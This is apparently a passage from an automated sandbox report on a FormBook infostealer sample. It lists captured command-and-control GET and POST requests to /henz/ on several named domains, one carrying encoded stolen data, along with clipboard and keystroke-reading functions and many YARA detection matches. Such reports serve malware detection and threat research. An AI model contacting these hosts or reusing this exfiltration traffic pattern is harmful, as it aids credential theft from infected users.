61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:10:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:10:58 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://gmpg.org/xfn/11
Source: qHpeBvr9cR.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: qHpeBvr9cR.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000003.00000000.356156439.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.336262975.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: -ODfqI49.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: -ODfqI49.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netsh.exe, 00000005.00000002.565816613.0000000003CE8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.lyonfinancialusa.com/henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIsz
Source: unknown HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 45 50 64 50 77 38 64 65 49 50 47 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
Source: unknown DNS traffic detected: queries for: www.eufidelizo.com
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1ACA0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard, 1_2_00B1ACA0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1B830 GetKeyboardState, 1_2_00B1B830
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405125

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: qHpeBvr9cR.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Contains functionality to shutdown / reboot the system
